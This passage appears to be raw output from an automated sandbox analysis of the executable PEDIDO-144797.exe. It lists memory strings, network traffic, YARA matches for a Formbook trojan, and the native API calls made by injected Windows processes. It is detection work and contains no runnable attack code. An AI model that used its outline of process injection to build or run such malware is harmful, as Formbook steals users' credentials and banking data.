        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAUhLdx.img
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAY97Jf.img
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAaeOki.img
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyxkRJ.img
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1d0ujS.img
        Source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=a7af015c-55f5-465b-b0e4-6fef
        Source: PEDIDO-144797.exe, 00000002.00000003.89664710675.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: explorer.exe, 00000005.00000000.91567643029.000000000D9E0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com~0
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009864000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009864000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comEM
        Source: PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000005.00000000.91567643029.000000000D9E0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.comF0
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.glamour.com/story/shag-haircut-photos-products
        Source: PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
        Source: PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
        Source: PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
        Source: PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.instyle.com/hair/shag-haircut-face-shape
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/autos/other/24-used-sports-cars-that-are-notoriously-reliable-yet-crazy-ch
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/channel/source/AZ%20Animals%20US/sr-vid-7etr9q8xun6k6508c3nufaum0de3dqktiq
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/entertainment/news/james-earl-jones-dies-at-93-all-about-his-son-flynn/ar-
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/feed
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/foodanddrink/recipes/i-asked-3-farmers-the-best-way-to-cook-zucchini-they-
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/health/medical/2-egg-brands-have-been-recalled-due-to-a-serious-salmonella
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/beauty/40-shag-haircuts-to-inspire-your-next-salon-visit/ss-AA1p
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/markets?id=a33k6h
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/markets?id=a3oxnm
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/markets?id=a6qja2
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/18-everyday-household-items-that-are-surprisingly-va
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/retirement/a-youtuber-asked-a-group-of-americans-aged-70-to-80-what-
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/retirement/middle-aged-americans-are-leaving-work-for-months-years-t
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/crime/dick-van-dyke-forever-young/ar-AA1lDpRD
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/crime/tyreek-hill-s-traffic-stop-shows-interactions-with-police-can-b
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/6-things-to-watch-for-when-kamala-harris-debates-donald-trum
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/chris-christie-former-trump-debate-coach-offers-key-pieces-o
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/jd-vance-spreads-outrageous-lie-about-haitian-immigrants/ar-
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/james-earl-jones-s-talents-went-far-far-beyond-his-magnificent-voi
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/trump-repeats-false-claims-that-children-are-undergoing-transgende
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/gaza-authorities-say-deadly-blasts-hit-humanitarian-zone/ar-AA1
        Source: explorer.exe, 00000005.00000000.91561655678.000000000972E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/play/games/cut-
        Source: explorer.exe, 00000005.00000000.91561655678.000000000972E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/play/games/drift-boss
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/sports/nba/johnny-gaudreau-s-wife-reveals-in-eulogy-she-s-pregnant-expecti
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/sports/nfl/49ers-win-over-jets-ends-with-final-score-that-s-never-been-see
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/travel/news/scientists-finally-solve-mystery-behind-bermuda-triangle-disap
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/tv/news/the-bold-the-beautiful-young-and-the-restless-more-get-premiere-da
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/forecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2xhcmEiL
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/hourlyforecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2x
        Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknown | HTTPS traffic detected: 142.251.40.206:443 -> 192.168.11.20:49732 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 142.250.80.97:443 -> 192.168.11.20:49733 version: TLS 1.2
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 0_2_00405553 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

        E-Banking Fraud

        Source: Yara match | File source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E34E0 NtCreateMutant,LdrInitializeThunk
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E2BC0 NtQueryInformationToken,LdrInitializeThunk
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E2B90 NtFreeVirtualMemory,LdrInitializeThunk
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E2EB0 NtProtectVirtualMemory,LdrInitializeThunk
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E2D10 NtQuerySystemInformation,LdrInitializeThunk
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E4260 NtSetContextThread
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E4570 NtSuspendThread
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E2A10 NtWriteFile
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E2AC0 NtEnumerateValueKey
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E2AA0 NtQueryInformationFile
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E2A80 NtClose
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E2B20 NtQueryInformationProcess
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E2B00 NtQueryValueKey
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E2B10 NtAllocateVirtualMemory
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E2BE0 NtQueryVirtualMemory
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E2B80 NtCreateKey
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E38D0 NtGetContextThread
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E29F0 NtReadFile
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E29D0 NtWaitForSingleObject
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 3_2_050C98B1 SleepEx,NtCreateSection
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 3_2_050C9AB4 SleepEx,NtResumeThread
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F334E0 NtCreateMutant,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32A80 NtClose,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32BC0 NtQueryInformationToken,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32B90 NtFreeVirtualMemory,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32B80 NtCreateKey,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32B10 NtAllocateVirtualMemory,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32B00 NtQueryValueKey,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F329F0 NtReadFile,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32E50 NtCreateSection,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32F00 NtCreateFile,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32CF0 NtDelayExecution,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32C30 NtMapViewOfSection,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32D10 NtQuerySystemInformation,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F34260 NtSetContextThread
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F34570 NtSuspendThread
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32AC0 NtEnumerateValueKey
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32AA0 NtQueryInformationFile
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32A10 NtWriteFile
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32BE0 NtQueryVirtualMemory
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32B20 NtQueryInformationProcess
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F338D0 NtGetContextThread
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F329D0 NtWaitForSingleObject
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32ED0 NtResumeThread
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32EC0 NtQuerySection
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32EB0 NtProtectVirtualMemory
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32E80 NtCreateProcessEx
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32E00 NtQueueApcThread
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32FB0 NtSetValueKey
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32F30 NtOpenDirectoryObject
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32CD0 NtEnumerateKey
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F33C90 NtOpenThread
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32C50 NtUnmapViewOfSection
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F33C30 NtOpenProcessToken
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32C20 NtSetInformationFile
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32C10 NtOpenProcess
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32DC0 NtAdjustPrivilegesToken
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32DA0 NtReadVirtualMemory
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02F32D50 NtWriteVirtualMemory
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02DDEEBA NtQueryInformationProcess
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02DE3A48 NtResumeThread
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02DE3728 NtSuspendThread
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02DE3408 NtSetContextThread
        Source: C:\Windows\SysWOW64\SecEdit.exe | Code function: 4_2_02DE3D68 NtQueueApcThread
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | File created: C:\Windows\resources\0409
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 0_2_00404D90
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 0_2_00406ABA
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_32672245
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3276124C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3269D2EC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3276F330
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326BE310
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326A1380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3275E076
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_327670F1
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326BB0D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326A00A0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326E508C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326F717A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3274D130
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3277010E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326B51C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326D4670
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3275D646
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3274D62C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326CC600
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3276F6F6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326AC6E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_327236EC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3276A6C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326B0680
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326B2760
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326BA760
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_32766757
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326B0445
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3277A526
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_327675C6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3276F5C9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3276EA5B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3276CA13
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326CFAA0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3276FA89
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3276FB2E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326EDB19
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326B0B10
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_32724BC0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_32696868
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3276F872
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326B9870
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326CB870
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_32750835
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326B3800
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326DE810
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_327678F3
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326B28C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_327618DA
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_327298B2
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326C6882
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326799E8
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326F59C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_326AE9A0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function: 2_2_3276E9A6
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 3_2_050D4169
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 3_2_050D31D4
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 3_2_050D3DD3
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 3_2_050D247F
